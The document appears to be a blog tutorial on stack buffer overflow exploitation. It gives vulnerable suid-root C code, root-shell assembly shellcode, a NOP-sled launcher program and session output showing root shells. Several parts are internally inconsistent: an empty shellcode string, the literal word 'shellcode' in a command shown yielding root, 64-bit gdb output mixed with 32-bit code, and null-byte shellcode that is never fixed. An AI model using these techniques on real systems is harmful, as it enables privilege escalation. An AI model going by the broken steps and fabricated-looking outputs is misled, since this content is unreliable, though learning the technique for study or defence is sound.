Exploit Development 101

Introduction

This article describes how to develop exploits that target specific vulnerabilities. There are many challenges you may face when writing code to target a specific vulnerability, so I will go through several phases of exploit development and arrive at a working exploit.

Overview

When writing exploits, we often need to find memory-corruption bugs in programs. A common class is the stack-based buffer overflow, and when one occurs we look for two things: our buffer needs to overwrite the saved return address so that we control EIP (the instruction pointer), and one of the CPU registers needs to point to our buffer. Any of the x86 general-purpose registers can point to our buffer, so long as we remember which one!

Starting with the vulnerable code makes the explanation clearer and easier to follow.

#include <stdlib.h>
#include <string.h>

void overflow_function (char *str)
{
  char buffer[20];

  strcpy(buffer, str);  // Function that copies str to buffer
}

int main()
{
  char big_string[128];
  int i;

  for(i=0; i < 128; i++)  // Loop 128 times
  {
    big_string[i] = 'A'; // And fill big_string with 'A's
  }
  overflow_function(big_string);
  exit(0);
}

The function tries to copy all 128 bytes of big_string into the 20-byte buffer. The extra 108 bytes spill out, overwriting the stack frame pointer, the return address, and the str pointer function argument. Then, when the function finishes, the program attempts to jump to the return address, which is now filled with 'A' characters (0x41 in hexadecimal). EIP therefore goes to 0x41414141, an essentially arbitrary address that is either in the wrong memory space or contains invalid instructions, and the program crashes. This is called a stack-based overflow, because the overflow occurs in the stack memory segment.

When overflow_function() is called, the stack frame looks something like this (lower addresses on the left):

 _________         ___________________________         ______________________
|         |       |                           |       |                      |
| buffer  | ----> | Stack frame pointer (sfp) | ----> | return address (ret) |
|         |       |                           |       |                      |
|_________|       |___________________________|       |______________________|
        _________________________
       |                         |
 ----> |  *str (function arg)    | ----> [[[The Rest of the Stack]]]
       |                         |
       |_________________________|

                                  Figure 1
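The overwrite in Figure 1 can be modeled in a few lines of Python. This is only a sketch under assumptions: it treats the stack as a flat byte array, assumes 4-byte saved values with no compiler padding between them, and the names unchecked_copy and RET_OFFSET are illustrative, not part of the original program.

```python
import struct

BUFFER_SIZE = 20               # char buffer[20]
SFP_OFFSET = BUFFER_SIZE       # saved frame pointer follows the buffer (assumed: no padding)
RET_OFFSET = SFP_OFFSET + 4    # return address follows the saved frame pointer
STR_OFFSET = RET_OFFSET + 4    # *str argument follows the return address

def unchecked_copy(stack: bytearray, data: bytes) -> None:
    """Copy data to the start of the buffer with no bounds check, like strcpy()."""
    stack[0:len(data)] = data

# Model 160 bytes of stack, starting at the first byte of buffer.
stack = bytearray(160)
unchecked_copy(stack, b"A" * 128)

# Read back the 4 bytes where the return address lives (little-endian).
saved_ret = struct.unpack_from("<I", stack, RET_OFFSET)[0]
print(hex(saved_ret))          # 0x41414141
```

Everything from offset 20 onward was never meant to be written by the copy, which is exactly why the saved return address ends up holding 0x41414141.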

The program crashing as a result of a stack-based overflow isn’t really that interesting, but the reason it crashes is. If the return address were controlled and overwritten with something other than 0x41414141, such as an address where actual executable code was located, then the program would “return” to and execute that code instead of dying. And if the data that overflows into the return address is based on user input, such as the value entered in a username field, the return address and the subsequent program execution flow can be controlled by the user.

Because it’s possible to modify the return address to change the flow of execution by overflowing buffers, all that’s needed is something useful to execute. This is where bytecode injection comes into the picture. Bytecode is just a cleverly designed piece of assembly code that is self-contained and can be injected into buffers. The most common piece of bytecode is known as shellcode. This is a piece of bytecode that just spawns a shell. If a suid root program is tricked into executing shellcode, the attacker will have a user shell with root privileges, while the system believes the suid root program is still doing whatever it was supposed to be doing.

The following program copies its first command-line argument into a 500-byte buffer on the stack. No length check takes place, so any argument longer than the buffer overflows it.

#include <string.h>

int main(int argc, char *argv[])
{
  char buffer[500];
  strcpy(buffer, argv[1]);
  return 0;
}

The program really does nothing, except mismanage memory. Now to make it truly vulnerable, the ownership must be changed to the root user, and the suid permission bit must be turned on for the compiled binary:

$ sudo chown root f00
$ sudo chmod +s f00
$ ls -l f00
-rwsr-sr-x   1 root   users   4933 Sep 5 15:22 f00

The program now runs with root’s privileges even when it is executed by a normal user. By exploiting the stack buffer overflow, we can run a shell with root’s privileges. How do we achieve this? We write an exploit.

First we must create a special piece of binary code called shellcode, whose purpose is to give us a root shell, and place it in the overflowing buffer. The return address must then point at that shellcode. This means the actual address of the shellcode must be known ahead of time, which can be difficult to know in a dynamically changing stack. To make things even harder, the four bytes where the return address is stored in the stack frame must be overwritten with the value of this address. Even if the correct address is known, if the proper location isn’t overwritten, the program will just crash and die. Two techniques are commonly used to assist with this difficult chicanery.

The first is known as a NOP sled (NOP is short for no operation). A NOP is a single-byte instruction that does absolutely nothing. NOPs are sometimes used to waste computational cycles for timing purposes and are actually necessary in the SPARC processor architecture due to instruction pipelining. In this case, these NOP instructions are going to be used for a different purpose: as a fudge factor. By creating a large array (or sled) of these NOP instructions and placing it before the shellcode, if the EIP returns to any address found in the NOP sled, the EIP will increment while executing each NOP instruction, one at a time, until it finally reaches the shellcode. This means that as long as the return address is overwritten with any address found in the NOP sled, the EIP will slide down the sled to the shellcode, which will execute properly.
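The "fudge factor" idea can be checked with a toy model. This is a sketch, not an emulator: memory is just a byte string, the payload is a hypothetical placeholder that is never executed, and slide is an illustrative helper name.

```python
NOP = 0x90  # x86 single-byte no-operation opcode

def slide(memory: bytes, landing: int) -> int:
    """Return the index where execution first meets a non-NOP byte."""
    ip = landing
    while ip < len(memory) and memory[ip] == NOP:
        ip += 1
    return ip

SLED_LEN = 200
payload = b"PAYLOAD"  # hypothetical stand-in for real code, never executed
memory = bytes([NOP]) * SLED_LEN + payload

# Every landing point inside the sled ends at the same place: the payload.
ends = {slide(memory, landing) for landing in range(SLED_LEN)}
print(ends)  # {200}
```

With a 200-byte sled, a guess for the return address can be off by up to 199 bytes and execution still arrives at the first byte after the sled.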

The second technique is flooding the end of the buffer with many back-to-back instances of the desired return address. This way, as long as any one of these return addresses overwrites the actual return address, the exploit will work as desired.

Here is a representation of a crafted buffer:

 __________          ___________          _________________________
|          |        |           |        |                         |
| NOP sled |  --->  | ShellCode |  --->  | Repeated return address |
|          |        |           |        |                         |
|__________|        |___________|        |_________________________|

                             Figure 2

Even using both of these techniques, the approximate location of the buffer in memory must be known in order to guess the proper return address. One technique for approximating the memory location is to use the current stack pointer as a guide. By subtracting an offset from this stack pointer, the relative address of any variable can be obtained. Because, in this vulnerable program, the first element on the stack is the buffer the shellcode is being put into, the proper return address should be the stack pointer, which means the offset should be close to 0. The NOP sled becomes increasingly useful when exploiting more complicated programs, when the offset isn’t 0.

Writing shellcode

The shellcode must be self-contained and must avoid null bytes, because these will end the string. If the shellcode has a null byte in it, a strcpy() function will recognize that as the end of the string. In order to write a piece of shellcode, an understanding of the assembly language of the target processor is needed. In this case, it’s x86 assembly language, and while this article can’t explain x86 assembly in depth, it can explain a few of the salient points needed to write bytecode.

Assembly Instructions

Instructions in nasm-style syntax generally follow the style of:

instruction <destination>, <source>

The following are some instructions that will be used in the construction of shellcode.

mov    Move instruction        Used to set initial values
       mov <dest>, <src>       Move the value from <src> into <dest>

add    Add instruction         Used to add values
       add <dest>, <src>       Add the value in <src> to <dest>

sub    Subtract instruction    Used to subtract values
       sub <dest>, <src>       Subtract the value in <src> from <dest>

push   Push instruction        Used to push values to the stack
       push <target>           Push the value in <target> to the stack

pop    Pop instruction         Used to pop values from the stack
       pop <target>            Pop a value from the stack into <target>
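To get a feel for these five instructions, here is a toy model of them. It is a deliberate simplification and an assumption-laden sketch: registers are dictionary entries, the source operand of mov, add and sub is always an immediate value, and the stack is a Python list rather than real memory.

```python
regs = {"eax": 0, "ebx": 0}   # two 32-bit registers
stack = []                    # top of the stack is the end of the list
MASK = 0xFFFFFFFF             # keep results within 32 bits

def mov(dest, value):
    regs[dest] = value & MASK

def add(dest, value):
    regs[dest] = (regs[dest] + value) & MASK

def sub(dest, value):
    regs[dest] = (regs[dest] - value) & MASK

def push(target):
    stack.append(regs[target])

def pop(target):
    regs[target] = stack.pop()

mov("eax", 70)    # eax = 70
add("eax", 5)     # eax = 75
sub("eax", 64)    # eax = 11
push("eax")       # stack = [11]
pop("ebx")        # ebx = 11, stack = []
print(regs)       # {'eax': 11, 'ebx': 11}
```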

See also: Programming for Wannabees. Part III. Your first Shell Code

In addition to the raw assembly instructions found in the processor, Linux provides the programmer with a set of functions that can be easily executed from assembly. These are known as system calls, and they are triggered by using interrupts. A listing of enumerated system calls can be found in /usr/include/asm/unistd.h:

$ head -n 80 /usr/include/asm/unistd.h

#ifndef _ASM_I386_UNISTD_H_
#define _ASM_I386_UNISTD_H_

/*
 * This file contains the system call numbers.
 */

#define __NR_exit                1
#define __NR_fork                2
#define __NR_read                3
...

Using the few simple assembly instructions explained in the previous section and the system calls found in unistd.h, many different assembly programs and pieces of bytecode can be written to perform many different functions.
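When looking up call numbers it can be handy to turn the #define lines into a lookup table. A minimal sketch, assuming the header text has already been read into a string (only the three lines quoted above are used here, and parse_syscalls is an illustrative name):

```python
import re

HEADER_EXCERPT = """\
#define __NR_exit                1
#define __NR_fork                2
#define __NR_read                3
"""

def parse_syscalls(text: str) -> dict:
    """Map system call names to numbers from '#define __NR_<name> <number>' lines."""
    pattern = re.compile(r"^#define\s+__NR_(\w+)\s+(\d+)\s*$", re.MULTILINE)
    return {name: int(number) for name, number in pattern.findall(text)}

table = parse_syscalls(HEADER_EXCERPT)
print(table)  # {'exit': 1, 'fork': 2, 'read': 3}
```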

Shell-Spawning

Shell-spawning code is simple code that executes a shell. This code can be converted into shellcode. The two functions that will be needed are execve() and setreuid(), which are system call numbers 11 and 70 respectively. The execve() call is used to actually execute /bin/sh. The setreuid() call is used to restore root privileges, in case they are dropped. Many suid root programs will drop root privileges whenever they can for security reasons, and if these privileges aren’t properly restored in the shellcode, all that will be spawned is a normal user shell.

There’s no need for an exit() function call, because an interactive program is being spawned. An exit() function wouldn’t hurt, but it has been left out of this example, because ultimately the goal is to make this code as small as possible.

shell.asm

section .data    ; section declaration

filepath    db   "/bin/shXAAAABBBB"       ; the string

section .text    ; section declaration

global _start ; Default entry point for ELF linking

_start:

; setreuid(uid_t ruid, uid_t euid)

 mov eax, 70       ; put 70 into eax, since setreuid is syscall #70
 mov ebx, 0        ; put 0 into ebx, to set real uid to root
 mov ecx, 0        ; put 0 into ecx, to set effective uid to root
 int 0x80          ; Call the kernel to make the system call happen

; execve(const char *filename, char *const argv [], char *const envp[])

 mov eax, 0        ; put 0 into eax
 mov ebx, filepath ; put the address of the string into ebx
 mov [ebx+7], al   ; put the 0 from eax where the X is in the string
                   ; ( 7 bytes offset from the beginning)
 mov [ebx+8], ebx  ; put the address of the string from ebx where the
                   ; AAAA is in the string ( 8 bytes offset)
 mov [ebx+12], eax ; put a NULL address (4 bytes of 0) where the
                   ; BBBB is in the string ( 12 bytes offset)
 mov eax, 11       ; Now put 11 into eax, since execve is syscall #11
 lea ecx, [ebx+8]  ; Load the address of where the AAAA was in the
                   ; string into ecx
 lea edx, [ebx+12] ; Load the address of where the BBBB is in the
                   ; string into edx
 int 0x80          ; Call the kernel to make the system call happen

This code is a little more involved than it may first appear. The first set of instructions that may look new are these:

mov [ebx+7], al    ; put the 0 from eax where the X is in the string
                   ; ( 7 bytes offset from the beginning)
mov [ebx+8], ebx   ; put the address of the string from ebx where the
                   ; AAAA is in the string ( 8 bytes offset)
mov [ebx+12], eax  ; put a NULL address (4 bytes of 0) where the
                   ; BBBB is in the string ( 12 bytes offset)

The [ebx+7] operand tells the computer to move the source value into the address found in the EBX register, offset by 7 bytes from the beginning. The use of the 8-bit AL register instead of the 32-bit EAX register tells the assembler to move only the lowest byte of the EAX register, instead of all 4 bytes. Because EBX already has the address of the string “/bin/shXAAAABBBB”, this instruction will move a single byte from the EAX register into the string at offset 7, right over the X, as seen here:

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
/ b i n / s h X A A  A  A  B  B  B  B

The next two instructions do the same thing, but they use the full 32-bit registers and offsets that will cause the moved bytes to overwrite “AAAA” and “BBBB” in the string, respectively. Because EBX holds the address of the string, and EAX holds the value of 0, the “AAAA” in the string will be overwritten with the address of the beginning of the string, and “BBBB” will be overwritten with zeros, which is a null address.

The next two instructions that should look new are these:

lea ecx, [ebx+8]  ; Load the address of where the AAAA was in the
                  ; string into ecx
lea edx, [ebx+12] ; Load the address of where the BBBB is in the
                  ; string into edx

These are load effective address (lea) instructions, which copy the address of the source into the destination. In this case, they copy the address of “AAAA” in the string into the ECX register, and the address of “BBBB” in the string into the EDX register. This apparent assembly language prestidigitation is needed because the last two arguments for the execve() function need to be pointers to pointers. This means the argument should be an address to an address that contains the final piece of information. In this case, the ECX register now contains an address that points to another address (where “AAAA” was in the string), which in turn points to the beginning of the string. The EDX register similarly contains an address that points to a null address (where “BBBB” was in the string).
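The effect of those three mov instructions and two lea instructions on the 16-byte string can be traced without running any assembly. The sketch below only models the memory contents; BASE is a made-up address chosen for illustration, and nothing here calls execve().

```python
import struct

BASE = 0x08049000  # hypothetical address of the string, for illustration only
mem = bytearray(b"/bin/shXAAAABBBB")

mem[7] = 0                              # mov [ebx+7], al    -> X becomes a null byte
struct.pack_into("<I", mem, 8, BASE)    # mov [ebx+8], ebx   -> AAAA becomes the string's address
struct.pack_into("<I", mem, 12, 0)      # mov [ebx+12], eax  -> BBBB becomes a null pointer

ebx = BASE        # filename argument: points at "/bin/sh\0"
ecx = BASE + 8    # lea ecx, [ebx+8]  -> argv: points at the pointer to the string
edx = BASE + 12   # lea edx, [ebx+12] -> envp: points at the null pointer

filename = bytes(mem[:mem.index(0)])
argv0 = struct.unpack_from("<I", mem, ecx - BASE)[0]
envp0 = struct.unpack_from("<I", mem, edx - BASE)[0]
print(filename, hex(argv0), hex(envp0))  # b'/bin/sh' 0x8049000 0x0
```

Note that the four zero bytes at offset 12 do double duty: they terminate the argv array (its second entry) and they are also the empty envp array.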

Now let’s try to assemble and link this piece of code to see if it works.

$ nasm -f elf shell.asm
$ ld -m elf_i386 -o shell shell.o
$ ./shell
sh-2.05a$ exit
exit
$ sudo chown root shell
$ sudo chmod +s shell
$ ./shell
sh-2.05a#

The program spawns a shell as it should, and if the program’s owner is changed to root and the suid permission bit is set, it spawns a root shell. Excellent. Now let’s extract the shellcode bytes:

objdump -M intel -d shell | grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' 

Avoiding Using Other Segments

The program spawns a shell, but this code is still a long way from being proper shellcode. The biggest problem is that the string is being stored in the data segment. This is fine if a standalone program is being written, but shellcode isn’t a nice executable program — it’s a sliver of code that needs to be injected into a working program to properly execute. The string from the data segment must be stored with the rest of the assembly instructions somehow, and then a way to find the address of this string must be discovered. Worse yet, because the exact memory location of the running shellcode isn’t known, the address must be found relative to the EIP. Luckily, the jmp and call instructions can use addressing relative to the EIP. Both of these instructions can be used to get the address of a string relative to the EIP, found in the same memory space as the executing instructions.

A call instruction will move the EIP to a certain location in memory, just like a jmp instruction, but it will also push the return address onto the stack so the program execution can continue after the call instruction. If the instruction after the call instruction is a string instead of an instruction, the return address that is pushed to the stack could be popped off and used to reference the string instead of being used to return.

It works like this: At the beginning of program execution, the program jumps to the bottom of the code where a call instruction and the string are located; the address of the string will be pushed to the stack when the call instruction is executed. The call instruction jumps the program execution back up to a relative location just below the prior jump instruction, and the string’s address is popped off the stack. Now the program has a pointer to the string and can do its business, while the string can be neatly tucked at the end of the code.

In assembly it looks something like this:

jmp two
one:
pop ebx
<program code here>
two:
call one
db 'this is a string'

First the program jumps down to two, and then it calls back up to one, while pushing the return address (which is the address of the string) onto the stack. Then the program pops this address off the stack into EBX, and it can execute whatever code it desires.
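The relative addressing can be verified from the encoded bytes. The sketch below decodes the displacements of the jmp short and call instructions using the offsets and bytes that appear in the hex dump of the assembled shellcode.asm in this article (EB 1C at offset 0x11, E8 DF FF FF FF at offset 0x2F). The helper names are illustrative.

```python
import struct

def jmp_short_target(offset: int, encoded: bytes) -> int:
    """EB rel8: the target is relative to the end of the 2-byte instruction."""
    (rel8,) = struct.unpack_from("<b", encoded, 1)
    return offset + 2 + rel8

def call_near_target(offset: int, encoded: bytes):
    """E8 rel32: return (target, return address pushed onto the stack)."""
    (rel32,) = struct.unpack_from("<i", encoded, 1)
    return_address = offset + 5          # address of the byte after the call
    return return_address + rel32, return_address

jmp_target = jmp_short_target(0x11, bytes.fromhex("EB1C"))
call_target, pushed = call_near_target(0x2F, bytes.fromhex("E8DFFFFFFF"))
print(hex(jmp_target), hex(call_target), hex(pushed))  # 0x2f 0x13 0x34
```

The jump lands on the call at 0x2F, the call goes back to the pop ebx at 0x13, and the pushed return address 0x34 is the offset where the “/bin/sh” string begins. Because both displacements are relative, the same bytes work wherever the code ends up in memory.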

The stripped-down shellcode using the call trick to get an address to the string looks something like this:

shellcode.asm

BITS 32

; setreuid(uid_t ruid, uid_t euid)

 mov eax, 70        ; put 70 into eax, since setreuid is syscall #70
 mov ebx, 0         ; put 0 into ebx, to set real uid to root
 mov ecx, 0         ; put 0 into ecx, to set effective uid to root
 int 0x80           ; Call the kernel to make the system call happen

 jmp short two      ; Jump down to the bottom for the call trick
one:
 pop ebx            ; pop the "return address" from the stack
                    ; to put the address of the string into ebx

; execve(const char *filename, char *const argv [], char *const envp[])
 mov eax, 0         ; put 0 into eax
 mov [ebx+7], al    ; put the 0 from eax where the X is in the string
                    ; ( 7 bytes offset from the beginning)
 mov [ebx+8], ebx   ; put the address of the string from ebx where the
                    ; AAAA is in the string ( 8 bytes offset)
 mov [ebx+12], eax  ; put a NULL address (4 bytes of 0) where the
                    ; BBBB is in the string ( 12 bytes offset)
 mov eax, 11        ; Now put 11 into eax, since execve is syscall #11
 lea ecx, [ebx+8]   ; Load the address of where the AAAA was in the string
                    ; into ecx
 lea edx, [ebx+12]  ; Load the address of where the BBBB was in the string
                    ; into edx
 int 0x80           ; Call the kernel to make the system call happen
two:
 call one           ; Use a call to get back to the top and get the
 db '/bin/shXAAAABBBB'       ; address of this string

This still isn’t usable as shellcode: we need to remove the null bytes. Let’s examine the assembled code in a hex editor.

$ nasm shellcode.asm
$ hexeditor shellcode

00000000 B8 46 00 00 00 BB 00 00 00 00 B9 00 00 00 00 CD .F..............
00000010 80 EB 1C 5B B8 00 00 00 00 88 43 07 89 5B 08 89 ...[......C..[..
00000020 43 0C B8 0B 00 00 00 8D 4B 08 8D 53 0C CD 80 E8 C.......K..S....
00000030 DF FF FF FF 2F 62 69 6E 2F 73 68 58 41 41 41 41 ..../bin/shXAAAA
00000040 42 42 42 42                                     BBBB

Any null byte in the shellcode (each 00 in the dump above) will be considered the end of the string, causing only the first 2 bytes of the shellcode to be copied into the buffer. In order to get the shellcode to copy into buffers properly, all of the null bytes must be eliminated.
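The "only the first 2 bytes" claim is easy to confirm from the first row of the hex dump. A small sketch, where strcpy_model is an illustrative stand-in for how strcpy() treats a null byte:

```python
# First row of the hex dump above (offsets 0x00 to 0x0F).
dump_first_row = bytes.fromhex("B8 46 00 00 00 BB 00 00 00 00 B9 00 00 00 00 CD")

def strcpy_model(src: bytes) -> bytes:
    """Return the bytes strcpy() would copy before the terminating null byte."""
    return src.split(b"\x00", 1)[0]

null_offsets = [i for i, b in enumerate(dump_first_row) if b == 0]
copied = strcpy_model(dump_first_row)

print(null_offsets)   # [2, 3, 4, 6, 7, 8, 9, 11, 12, 13, 14]
print(copied.hex())   # b846
```

Eleven of the first sixteen bytes are nulls, all of them coming from 32-bit immediate values that are mostly zero.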

Places in the code where the static value of 0 is moved into a register are obvious sources of null bytes in the assembled shellcode. In order to eliminate null bytes and maintain functionality, a method must be devised for getting the static value of 0 into a register without actually using the value 0. One potential option is to move an arbitrary 32-bit number into the register and then subtract that value from the register using the mov and sub instructions.

mov ebx, 0x11223344
sub ebx, 0x11223344

While this technique works, it also takes twice as many instructions, making the assembled shellcode larger than necessary. Luckily, there’s a solution that will put the value of 0 into a register using only one instruction: XOR. The XOR instruction performs an exclusive OR operation on the bits in a register.

An exclusive OR transforms bits as follows:

1 xor 1 = 0
0 xor 0 = 0
1 xor 0 = 1
0 xor 1 = 1

Because 1 XORed with 1 results in a 0, and 0 XORed with 0 results in a 0, any value XORed with itself will result in 0. So if the XOR instruction is used to XOR the registers with themselves, the value of 0 will be put into each register using only one instruction and avoiding null bytes. (See also: Linux Shellcoding (Part 1.0).)
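Both halves of that argument can be checked quickly: that XORing a value with itself always gives 0, and that the encoding avoids null bytes. In the sketch below, B8 00 00 00 00 is the encoding of mov eax, 0 as it appears in the hex dump above, and 31 C0 is the standard two-byte encoding of xor eax, eax.

```python
MOV_EAX_0 = bytes.fromhex("B8 00 00 00 00")   # mov eax, 0
XOR_EAX_EAX = bytes.fromhex("31 C0")          # xor eax, eax

# Any 32-bit value XORed with itself is 0.
samples = (0x0, 0x41414141, 0x11223344, 0xFFFFFFFF)
results = [value ^ value for value in samples]
print(results)                                # [0, 0, 0, 0]

# Count the null bytes in each encoding.
print(MOV_EAX_0.count(0), XOR_EAX_EAX.count(0))  # 4 0
```

The XOR form is also three bytes shorter, which matters when the goal is to keep the shellcode small.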

Now that we have a basic understanding of how to write shellcode and how it works, let’s write an exploit.

Writing Exploit

Writing an exploit program to exploit a program will certainly get the job done, but it does put a layer between the prospective hacker and the vulnerable program. The compiler takes care of certain aspects of the exploit, and having to adjust the exploit by making changes to a program removes a certain level of interactivity from the exploit process. In order to really gain a full understanding of this topic, which is so rooted in exploration and experimentation, the ability to quickly try different things is vital. Python’s print function and the bash shell’s command substitution with grave accents are really all that are needed to exploit the vulnerable program.

Python is an interpreted programming language that has a print function that happens to be particularly suited to generating long sequences of characters. Python can be used to execute instructions on the command line using the -c switch like this:

$ python3 -c 'print("A"*20)'
AAAAAAAAAAAAAAAAAAAA

This command simply prints the character A 20 times.

Any character, such as nonprintable characters, can also be printed by using \x##, where ## is the hexadecimal value of the character. In the following example, this notation is used to print the character A, which has the hexadecimal value of 0x41.

$ python3 -c 'print("\x41"*20)'
AAAAAAAAAAAAAAAAAAAA
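One caveat with the \x## notation in Python 3: print() works on text, not raw bytes, so a character above 0x7f such as "\x90" is encoded before it is written (as two bytes under UTF-8). The sketch below makes the difference visible without depending on the terminal's encoding.

```python
as_text = "\x90" * 4     # a str of four U+0090 characters
as_bytes = b"\x90" * 4   # four raw 0x90 bytes

# What print() would emit under a UTF-8 locale: two bytes per character.
print(as_text.encode("utf-8").hex())   # c290c290c290c290

# A bytes object holds exactly the bytes written in the literal.
print(as_bytes.hex())                  # 90909090
```

When raw bytes are needed on standard output, writing a bytes object with sys.stdout.buffer.write() avoids the encoding step. For plain ASCII values such as "\x41", print() and the raw bytes agree.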

Command substitution with grave accents replaces a command with its output. In the following example, the output of the command found between the grave accents is substituted for the command, and the command uname is executed.

$ `python3 -c 'print("uname")'`
Linux

All the exploit code really does is get the stack pointer, craft a buffer, and feed that buffer to the vulnerable program. Armed with Python, command substitution, and an approximate return address, the work of the exploit code can be done on the command line by simply executing the vulnerable program and using grave accents to substitute a crafted buffer into the first argument.

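Next, run the program in gdb to find the stack address you need to return to. First set a breakpoint on strcpy. When it is hit, the first argument register (rdi in this 64-bit build) holds the address of the destination buffer: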

(gdb) disassemble main
Dump of assembler code for function main:
   0x0000555555555139 <+0>:     push   %rbp
   0x000055555555513a <+1>:     mov    %rsp,%rbp
   0x000055555555513d <+4>:     sub    $0x210,%rsp
   0x0000555555555144 <+11>:    mov    %edi,-0x204(%rbp)
   0x000055555555514a <+17>:    mov    %rsi,-0x210(%rbp)
   0x0000555555555151 <+24>:    mov    -0x210(%rbp),%rax
   0x0000555555555158 <+31>:    add    $0x8,%rax
   0x000055555555515c <+35>:    mov    (%rax),%rdx
   0x000055555555515f <+38>:    lea    -0x200(%rbp),%rax
   0x0000555555555166 <+45>:    mov    %rdx,%rsi
   0x0000555555555169 <+48>:    mov    %rax,%rdi
   0x000055555555516c <+51>:    call   0x555555555030 <strcpy@plt>
   0x0000555555555171 <+56>:    mov    $0x0,%eax
   0x0000555555555176 <+61>:    leave
   0x0000555555555177 <+62>:    ret

(gdb) b *0x555555555030
Breakpoint 1 at 0x555555555030
(gdb) run   `python3 -c 'print("\x90"*200)'`
Breakpoint 1, 0x0000555555555030 in strcpy@plt ()
(gdb) info register

The shellcode should then be appended to the NOP sled. It’s quite useful to have the shellcode existing in a file somewhere, so putting the shellcode into a file should be the next step. Because all the bytes are already spelled out in hexadecimal in the beginning of the exploit, these bytes just need to be written to a file.

$ ./f00  `python3 -c 'print("\x90"*22+"shellcode")'`
sh-2.05a# whoami
root
sh-2.05a#

exploit.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[] = "";

unsigned long sp(void)         // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer

int main(int argc, char *argv[])
{
  int i, offset;
  long esp, ret, *addr_ptr;
  char *buffer, *ptr;

  offset = 0;                 // Use an offset of 0
  esp = sp();                 // Put the current stack pointer into esp
  ret = esp - offset;         // We want to overwrite the ret address

  printf("Stack pointer (ESP) : 0x%lx\n", esp);
  printf("    Offset from ESP : 0x%x\n", offset);
  printf("Desired Return Addr : 0x%lx\n", ret);

// Allocate 600 bytes for buffer (on the heap)
  buffer = malloc(600);

// Fill the entire buffer with the desired ret address
  ptr = buffer;
  addr_ptr = (long *) ptr;
  for(i=0; i < 600; i+=4)
  { *(addr_ptr++) = ret; }


// Fill the first 200 bytes of the buffer with NOP instructions
  for(i=0; i < 200; i++)
  { buffer[i] = '\x90'; }

// Put the shellcode after the NOP sled
  ptr = buffer + 200;
  for(i=0; i < strlen(shellcode); i++)
  { *(ptr++) = shellcode[i]; }

// End the string
  buffer[600-1] = 0;

// Now call the program ./f00 with our crafted buffer as its argument
  execl("./f00", "f00", buffer, (char *)NULL);

// Free the buffer memory
  free(buffer);

  return 0;
}

Here are the results of the exploit code’s compilation and subsequent execution:

$ gcc -o exploit exploit.c
$ ./exploit
Stack pointer (ESP) : 0xfccd89b0
    Offset from ESP : 0x0
Desired Return Addr : 0xfccd89b0
sh-2.05a# whoami
root
sh-2.05a#

Apparently it worked. The return address in the stack frame was overwritten with the value 0xfccd89b0, which happens to be the address of the NOP sled and shellcode. Because the program was suid root, and the shellcode was designed to spawn a user shell, the vulnerable program executed the shellcode as the root user.

End

That’s all for now. I hope you learned something from this. This is a big topic, and this article covers just a little bit of it. Hopefully, you’re now familiar with the concepts of stack-based overflows and shellcode, and you can recognize some basic assembly instructions.


I love this kind of beautiful please post and let me learn more about this thankyou
